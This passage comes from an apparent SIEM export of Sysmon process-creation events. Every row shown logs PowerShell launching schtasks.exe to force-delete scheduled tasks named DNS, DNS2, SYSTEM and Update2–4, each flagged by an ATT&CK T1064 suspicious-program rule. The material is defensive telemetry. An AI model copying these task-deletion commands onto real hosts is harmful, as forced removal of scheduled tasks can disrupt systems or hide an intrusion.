Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.389",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.578 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00102b493100} +ProcessId: 7336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.585618200Z"",""eventRecordID"":""3960"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.578\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00102b493100}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.578"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00102b493100}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.372",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.484 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-001081473100} +ProcessId: 1288 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.488394800Z"",""eventRecordID"":""3959"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.484\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-001081473100}\r\nProcessId: 1288\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.484"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-001081473100}"",""processId"":""1288"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.361",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.435 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010dc453100} +ProcessId: 3496 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.440934400Z"",""eventRecordID"":""3958"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.435\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010dc453100}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.435"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010dc453100}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.344",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.406 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f4433100} +ProcessId: 7252 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.409573400Z"",""eventRecordID"":""3957"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.406\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f4433100}\r\nProcessId: 7252\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.406"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-0010f4433100}"",""processId"":""7252"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.328",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.366 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-001045423100} +ProcessId: 7936 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.372336400Z"",""eventRecordID"":""3956"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.366\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-001045423100}\r\nProcessId: 7936\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.366"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-001045423100}"",""processId"":""7936"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.311",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.300 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-00105b403100} +ProcessId: 4544 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.310198600Z"",""eventRecordID"":""3955"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.300\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-00105b403100}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:40.300"",""processGuid"":""{df9fc3d3-b418-5ecf-0000-00105b403100}"",""processId"":""4544"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.285",14,"ATT&CK T1064: Windows Shell 